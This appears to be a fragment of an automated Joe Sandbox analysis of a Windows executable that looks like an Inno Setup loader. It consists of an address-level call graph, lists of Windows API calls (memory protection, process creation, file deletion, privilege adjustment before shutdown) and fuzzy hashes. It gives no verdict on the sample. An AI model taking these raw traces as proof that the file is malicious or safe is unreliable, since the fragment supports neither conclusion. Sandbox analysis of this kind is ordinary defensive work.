6805->6806 6807 403fd6 6806->6807 6808 403e9c 4 API calls 6807->6808 6809 403fe2 6808->6809 5463 4024d0 5464 4024e4 5463->5464 5465 4024f7 5463->5465 5502 401918 RtlInitializeCriticalSection 5464->5502 5467 402518 5465->5467 5468 40250e RtlEnterCriticalSection 5465->5468 5479 402300 5467->5479 5468->5467 5471 4024ed 5473 402525 5476 402581 5473->5476 5477 402577 RtlLeaveCriticalSection 5473->5477 5475 402531 5475->5473 5509 40215c 5475->5509 5477->5476 5480 402314 5479->5480 5481 402335 5480->5481 5482 4023b8 5480->5482 5484 402344 5481->5484 5523 401b74 5481->5523 5482->5484 5487 402455 5482->5487 5526 401d80 5482->5526 5534 401e84 5482->5534 5484->5473 5489 401fd4 5484->5489 5487->5484 5530 401d00 5487->5530 5490 401fe8 5489->5490 5491 401ffb 5489->5491 5492 401918 4 API calls 5490->5492 5493 402012 RtlEnterCriticalSection 5491->5493 5496 40201c 5491->5496 5494 401fed 5492->5494 5493->5496 5494->5491 5495 401ff1 5494->5495 5499 402052 5495->5499 5496->5499 5616 401ee0 5496->5616 5499->5475 5500 402147 5500->5475 5501 40213d RtlLeaveCriticalSection 5501->5500 5503 40193c RtlEnterCriticalSection 5502->5503 5504 401946 5502->5504 5503->5504 5505 401964 LocalAlloc 5504->5505 5506 40197e 5505->5506 5507 4019c3 RtlLeaveCriticalSection 5506->5507 5508 4019cd 5506->5508 5507->5508 5508->5465 5508->5471 5510 40217a 5509->5510 5511 402175 5509->5511 5512 4021ab RtlEnterCriticalSection 5510->5512 5515 4021b5 5510->5515 5519 40217e 5510->5519 5513 401918 4 API calls 5511->5513 5512->5515 5513->5510 5514 4021c1 5517 4022e3 RtlLeaveCriticalSection 5514->5517 5518 4022ed 5514->5518 5515->5514 5516 402244 5515->5516 5521 402270 5515->5521 5516->5519 5520 401d80 7 API calls 5516->5520 5517->5518 5518->5473 5519->5473 5520->5519 5521->5514 5522 401d00 7 API calls 5521->5522 5522->5514 5524 40215c 9 API calls 5523->5524 5525 401b95 5524->5525 5525->5484 5527 401d92 5526->5527 5528 401d89 5526->5528 5527->5482 5528->5527 5529 401b74 9 API calls 5528->5529 5529->5527 5531 401d1e 
5530->5531 5532 401d4e 5530->5532 5531->5484 5532->5531 5539 401c68 5532->5539 5594 401768 5534->5594 5536 401e99 5537 401ea6 5536->5537 5605 401dcc 5536->5605 5537->5482 5540 401c7a 5539->5540 5541 401c9d 5540->5541 5542 401caf 5540->5542 5552 40188c 5541->5552 5543 40188c 3 API calls 5542->5543 5545 401cad 5543->5545 5546 401cc5 5545->5546 5562 401b44 5545->5562 5546->5531 5548 401cd4 5549 401cee 5548->5549 5567 401b98 5548->5567 5572 4013a0 5549->5572 5553 4018b2 5552->5553 5561 40190b 5552->5561 5576 401658 5553->5576 5558 4018e6 5560 4013a0 LocalAlloc 5558->5560 5558->5561 5560->5561 5561->5545 5563 401b52 5562->5563 5564 401b61 5562->5564 5565 401d00 9 API calls 5563->5565 5564->5548 5566 401b5f 5565->5566 5566->5548 5568 401bab 5567->5568 5569 401b9d 5567->5569 5568->5549 5570 401b74 9 API calls 5569->5570 5571 401baa 5570->5571 5571->5549 5573 4013ab 5572->5573 5574 4012e4 LocalAlloc 5573->5574 5575 4013c6 5573->5575 5574->5575 5575->5546 5579 40168f 5576->5579 5577 4016cf 5580 40132c 5577->5580 5578 4016a9 VirtualFree 5578->5579 5579->5577 5579->5578 5581 401348 5580->5581 5588 4012e4 5581->5588 5584 40150c 5586 40153b 5584->5586 5585 401594 5585->5558 5586->5585 5587 401568 VirtualFree 5586->5587 5587->5586 5591 40128c 5588->5591 5592 401298 LocalAlloc 5591->5592 5593 4012aa 5591->5593 5592->5593 5593->5558 5593->5584 5595 401787 5594->5595 5596 40183b 5595->5596 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5595->5597 5599 40132c LocalAlloc 5595->5599 5600 401821 5595->5600 5601 4017d6 5595->5601 5602 4017e7 5596->5602 5612 4015c4 5596->5612 5597->5595 5599->5595 5603 40150c VirtualFree 5600->5603 5604 40150c VirtualFree 5601->5604 5602->5536 5603->5602 5604->5602 5606 401d80 9 API calls 5605->5606 5607 401de0 5606->5607 5608 40132c LocalAlloc 5607->5608 5609 401df0 5608->5609 5610 401b44 9 API calls 5609->5610 5611 401df8 5609->5611 5610->5611 5611->5537 5613 40160a 5612->5613 5614 401626 VirtualAlloc 5613->5614 5615 40163a 5613->5615 
5614->5613 5614->5615 5615->5602 5620 401ef0 5616->5620 5617 401f1c 5618 401d00 9 API calls 5617->5618 5621 401f40 5617->5621 5618->5621 5620->5617 5620->5621 5622 401e58 5620->5622 5621->5500 5621->5501 5627 4016d8 5622->5627 5625 401dcc 9 API calls 5626 401e75 5625->5626 5626->5620 5633 4016f4 5627->5633 5629 4016fe 5630 4015c4 VirtualAlloc 5629->5630 5635 40170a 5630->5635 5631 40175b 5631->5625 5631->5626 5632 40132c LocalAlloc 5632->5633 5633->5629 5633->5631 5633->5632 5634 40174f 5633->5634 5637 401430 5633->5637 5636 40150c VirtualFree 5634->5636 5635->5631 5636->5631 5638 40143f VirtualAlloc 5637->5638 5640 40146c 5638->5640 5641 40148f 5638->5641 5642 4012e4 LocalAlloc 5640->5642 5641->5633 5643 401478 5642->5643 5643->5641 5644 40147c VirtualFree 5643->5644 5644->5641 6485 4028d2 6486 4028da 6485->6486 6487 403554 4 API calls 6486->6487 6488 4028ef 6486->6488 6487->6486 6489 4025ac 4 API calls 6488->6489 6490 4028f4 6489->6490 6810 4019d3 6811 4019ba 6810->6811 6812 4019c3 RtlLeaveCriticalSection 6811->6812 6813 4019cd 6811->6813 6812->6813 6032 407fd4 6033 407fe6 6032->6033 6035 407fed 6032->6035 6043 407f10 6033->6043 6037 408015 6035->6037 6038 408017 6035->6038 6042 408021 6035->6042 6036 40804e 6057 407e2c 6037->6057 6054 407d7c 6038->6054 6039 407d7c 19 API calls 6039->6036 6042->6036 6042->6039 6044 407f25 6043->6044 6045 407d7c 19 API calls 6044->6045 6046 407f34 6044->6046 6045->6046 6047 407f6e 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f82 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6053 407fae 6049->6053 6064 407eb8 6049->6064 6050->6049 6053->6035 6067 4058b4 6054->6067 6056 407d9e 6056->6042 6058 405184 19 API calls 6057->6058 6059 407e57 6058->6059 6075 407de4 6059->6075 6061 407e5f 6062 403198 4 API calls 6061->6062 6063 407e74 6062->6063 6063->6042 6065 407ec7 VirtualFree 6064->6065 6066 407ed9 VirtualAlloc 6064->6066 6065->6066 6066->6053 6068 4058c0 6067->6068 6069 405184 19 API calls 6068->6069 6070 4058ed 
6069->6070 6071 4031e8 4 API calls 6070->6071 6072 4058f8 6071->6072 6073 403198 4 API calls 6072->6073 6074 40590d 6073->6074 6074->6056 6076 4058b4 19 API calls 6075->6076 6077 407e06 6076->6077 6077->6061 6495 40a0d5 6496 40a105 6495->6496 6497 40a10f CreateWindowExA SetWindowLongA 6496->6497 6498 405184 19 API calls 6497->6498 6499 40a192 6498->6499 6500 4032fc 4 API calls 6499->6500 6501 40a1a0 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1ad 6502->6503 6504 406b7c 5 API calls 6503->6504 6505 40a1b9 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1c2 6506->6507 6508 4099a4 29 API calls 6507->6508 6509 40a1d4 6508->6509 6510 409884 5 API calls 6509->6510 6511 40a1e7 6509->6511 6510->6511 6512 40a220 6511->6512 6513 4094d8 9 API calls 6511->6513 6514 40a239 6512->6514 6517 40a233 RemoveDirectoryA 6512->6517 6513->6512 6515 40a242 73A25CF0 6514->6515 6516 40a24d 6514->6516 6515->6516 6518 40a275 6516->6518 6519 40357c 4 API calls 6516->6519 6517->6514 6520 40a26b 6519->6520 6521 4025ac 4 API calls 6520->6521 6521->6518 6080 40a0e7 6081 40a0eb SetLastError 6080->6081 6112 409648 GetLastError 6081->6112 6084 40a105 6086 40a10f CreateWindowExA SetWindowLongA 6084->6086 6085 402f24 5 API calls 6085->6084 6087 405184 19 API calls 6086->6087 6088 40a192 6087->6088 6089 4032fc 4 API calls 6088->6089 6090 40a1a0 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1ad 6091->6092 6125 406b7c GetCommandLineA 6092->6125 6095 4032fc 4 API calls 6096 40a1c2 6095->6096 6130 4099a4 6096->6130 6099 409884 5 API calls 6100 40a1e7 6099->6100 6101 40a220 6100->6101 6102 40a207 6100->6102 6104 40a239 6101->6104 6107 40a233 RemoveDirectoryA 6101->6107 6146 4094d8 6102->6146 6105 40a242 73A25CF0 6104->6105 6106 40a24d 6104->6106 6105->6106 6108 40a275 6106->6108 6154 40357c 6106->6154 6107->6104 6110 40a26b 6111 4025ac 4 API calls 6110->6111 6111->6108 6113 404c84 19 API calls 6112->6113 6114 40968f 6113->6114 6115 407284 5 API calls 6114->6115 6116 40969f 6115->6116 
6117 408da8 4 API calls 6116->6117 6118 4096b4 6117->6118 6119 405880 4 API calls 6118->6119 6120 4096c3 6119->6120 6121 4031b8 4 API calls 6120->6121 6122 4096e2 6121->6122 6123 403198 4 API calls 6122->6123 6124 4096ea 6123->6124 6124->6084 6124->6085 6126 406af0 4 API calls 6125->6126 6127 406ba1 6126->6127 6128 403198 4 API calls 6127->6128 6129 406bbf 6128->6129 6129->6095 6131 4033b4 4 API calls 6130->6131 6132 4099df 6131->6132 6133 409a11 CreateProcessA 6132->6133 6134 409a24 CloseHandle 6133->6134 6135 409a1d 6133->6135 6137 409a2d 6134->6137 6136 409648 21 API calls 6135->6136 6136->6134 6167 409978 6137->6167 6140 409a49 6141 409978 3 API calls 6140->6141 6142 409a4e GetExitCodeProcess CloseHandle 6141->6142 6143 409a6e 6142->6143 6144 403198 4 API calls 6143->6144 6145 409a76 6144->6145 6145->6099 6145->6100 6147 409532 6146->6147 6148 4094eb 6146->6148 6147->6101 6148->6147 6149 4094f3 Sleep 6148->6149 6150 409503 Sleep 6148->6150 6152 40951a GetLastError 6148->6152 6171 408fbc 6148->6171 6149->6148 6150->6148 6152->6147 6153 409524 GetLastError 6152->6153 6153->6147 6153->6148 6155 403591 6154->6155 6163 4035a0 6154->6163 6159 4035d0 6155->6159 6160 40359b 6155->6160 6162 4035b6 6155->6162 6156 4035b1 6161 403198 4 API calls 6156->6161 6157 4035b8 6158 4031b8 4 API calls 6157->6158 6158->6162 6159->6162 6165 40357c 4 API calls 6159->6165 6160->6163 6164 4035ec 6160->6164 6161->6162 6162->6110 6163->6156 6163->6157 6164->6162 6179 403554 6164->6179 6165->6159 6168 40998c PeekMessageA 6167->6168 6169 409980 TranslateMessage DispatchMessageA 6168->6169 6170 40999e MsgWaitForMultipleObjects 6168->6170 6169->6168 6170->6137 6170->6140 6172 408f70 2 API calls 6171->6172 6173 408fd2 6172->6173 6174 408fd6 6173->6174 6175 408ff2 DeleteFileA GetLastError 6173->6175 6174->6148 6176 409010 6175->6176 6177 408fac Wow64RevertWow64FsRedirection 6176->6177 6178 409018 6177->6178 6178->6148 6180 403566 6179->6180 6182 403578 6180->6182 6183 403604 6180->6183 
6182->6164 6185 40357c 6183->6185 6184 4035a0 6186 4035b1 6184->6186 6187 4035b8 6184->6187 6185->6184 6189 4035d0 6185->6189 6190 40359b 6185->6190 6192 4035b6 6185->6192 6191 403198 4 API calls 6186->6191 6188 4031b8 4 API calls 6187->6188 6188->6192 6189->6192 6194 40357c 4 API calls 6189->6194 6190->6184 6193 4035ec 6190->6193 6191->6192 6192->6180 6193->6192 6195 403554 4 API calls 6193->6195 6194->6189 6195->6193 6817 402be9 RaiseException 6818 402c04 6817->6818 6528 402af2 6529 402afe 6528->6529 6532 402ed0 6529->6532 6533 403154 4 API calls 6532->6533 6535 402ee0 6533->6535 6534 402b03 6535->6534 6537 402b0c 6535->6537 6538 402b25 6537->6538 6539 402b15 RaiseException 6537->6539 6538->6534 6539->6538 6819 402dfa 6820 402e26 6819->6820 6821 402e0d 6819->6821 6823 402ba4 6821->6823 6824 402bc9 6823->6824 6825 402bad 6823->6825 6824->6820 6826 402bb5 RaiseException 6825->6826 6826->6824 6827 4075fa GetFileSize 6828 407626 6827->6828 6829 407616 GetLastError 6827->6829 6829->6828 6830 40761f 6829->6830 6831 40748c 21 API calls 6830->6831 6831->6828 6832 406ffb 6833 407008 SetErrorMode 6832->6833 6544 403a80 CloseHandle 6545 403a90 6544->6545 6546 403a91 GetLastError 6544->6546 6547 40a282 6548 40a1f4 6547->6548 6549 4094d8 9 API calls 6548->6549 6551 40a220 6548->6551 6549->6551 6550 40a239 6552 40a242 73A25CF0 6550->6552 6553 40a24d 6550->6553 6551->6550 6554 40a233 RemoveDirectoryA 6551->6554 6552->6553 6555 40a275 6553->6555 6556 40357c 4 API calls 6553->6556 6554->6550 6557 40a26b 6556->6557 6558 4025ac 4 API calls 6557->6558 6558->6555 6559 404283 6560 4042c3 6559->6560 6561 403154 4 API calls 6560->6561 6562 404323 6561->6562 6834 404185 6835 4041ff 6834->6835 6836 4041cc 6835->6836 6837 403154 4 API calls 6835->6837 6838 404323 6837->6838 6563 40a287 6564 40a290 6563->6564 6566 40a2bb 6563->6566 6573 409448 6564->6573 6568 403198 4 API calls 6566->6568 6567 40a295 6567->6566 6570 40a2b3 MessageBoxA 6567->6570 6569 40a2f3 6568->6569 6571 403198 4 API 
calls 6569->6571 6570->6566 6572 40a2fb 6571->6572 6574 409454 GetCurrentProcess OpenProcessToken 6573->6574 6575 4094af ExitWindowsEx 6573->6575 6576 409466 6574->6576 6577 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6574->6577 6575->6576 6576->6567 6577->6575 6577->6576 6578 403e87 6579 403e4c 6578->6579 6580 403e62 6579->6580 6581 403e7b 6579->6581 6582 403e67 6579->6582 6587 403cc8 6580->6587 6583 402674 4 API calls 6581->6583 6585 403e78 6582->6585 6591 402674 6582->6591 6583->6585 6588 403cd6 6587->6588 6589 402674 4 API calls 6588->6589 6590 403ceb 6588->6590 6589->6590 6590->6582 6592 403154 4 API calls 6591->6592 6593 40267a 6592->6593 6593->6585 6598 407e90 6599 407eb8 VirtualFree 6598->6599 6600 407e9d 6599->6600 6847 403991 6848 403983 6847->6848 6849 40374c VariantClear 6848->6849 6850 40398b 6849->6850 6851 405b92 6853 405b94 6851->6853 6852 405bd0 6856 405930 5 API calls 6852->6856 6853->6852 6854 405be7 6853->6854 6855 405bca 6853->6855 6860 404ccc 5 API calls 6854->6860 6855->6852 6857 405c3c 6855->6857 6858 405be3 6856->6858 6859 4059a0 19 API calls 6857->6859 6861 403198 4 API calls 6858->6861 6859->6858 6862 405c10 6860->6862 6863 405c76 6861->6863 6864 4059a0 19 API calls 6862->6864 6864->6858 6603 403e95 6604 403e4c 6603->6604 6605 403e67 6604->6605 6606 403e62 6604->6606 6607 403e7b 6604->6607 6610 403e78 6605->6610 6611 402674 4 API calls 6605->6611 6609 403cc8 4 API calls 6606->6609 6608 402674 4 API calls 6607->6608 6608->6610 6609->6605 6611->6610 6612 403a97 6613 403aac 6612->6613 6614 403bbc GetStdHandle 6613->6614 6615 403b0e CreateFileA 6613->6615 6625 403ab2 6613->6625 6616 403c17 GetLastError 6614->6616 6620 403bba 6614->6620 6615->6616 6617 403b2c 6615->6617 6616->6625 6619 403b3b GetFileSize 6617->6619 6617->6620 6619->6616 6622 403b4e SetFilePointer 6619->6622 6621 403be7 GetFileType 6620->6621 6620->6625 6624 403c02 CloseHandle 6621->6624 6621->6625 6622->6616 6626 403b6a ReadFile 6622->6626 6624->6625 
6626->6616 6627 403b8c 6626->6627 6627->6620 6628 403b9f SetFilePointer 6627->6628 6628->6616 6629 403bb0 SetEndOfFile 6628->6629 6629->6616 6629->6620 6883 4011aa 6884 4011ac GetStdHandle 6883->6884 6222 4076ac SetEndOfFile 6223 4076c3 6222->6223 6224 4076bc 6222->6224 6225 40748c 21 API calls 6224->6225 6225->6223 6633 4028ac 6634 402594 4 API calls 6633->6634 6635 4028b6 6634->6635 6636 401ab9 6637 401a96 6636->6637 6638 401aa9 RtlDeleteCriticalSection 6637->6638 6639 401a9f RtlLeaveCriticalSection 6637->6639 6639->6638

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                  • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                  • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ProtectQuery$InfoSystem
                                                                  • String ID:
                                                                  • API String ID: 2441996862-0
                                                                  • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                  • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                  • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                  • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                  • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                  • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                  • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                  • API String ID: 3256987805-3653653586
                                                                  • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                  • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                  • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                  • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • SetLastError.KERNEL32 ref: 0040A0F4
                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0217237C), ref: 0040966C
                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                  • SetWindowLongA.USER32(000403E6,000000FC,00409918), ref: 0040A148
                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                  • 73A25CF0.USER32(000403E6,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                  • API String ID: 3341979996-3001827809
                                                                  • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                  • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                  • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                  • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                  • API String ID: 1646373207-2130885113
                                                                  • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                  • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                  • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                  • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                  • SetWindowLongA.USER32(000403E6,000000FC,00409918), ref: 0040A148
                                                                    • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                    • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000,00409A77), ref: 00409A14
                                                                    • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000), ref: 00409A28
                                                                    • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                    • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                    • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90), ref: 00409A5C
                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                  • 73A25CF0.USER32(000403E6,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                  • API String ID: 978128352-3001827809
                                                                  • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                  • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                  • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                  • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000,00409A77), ref: 00409A14
                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000), ref: 00409A28
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                  • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90), ref: 00409A5C
                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0217237C), ref: 0040966C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
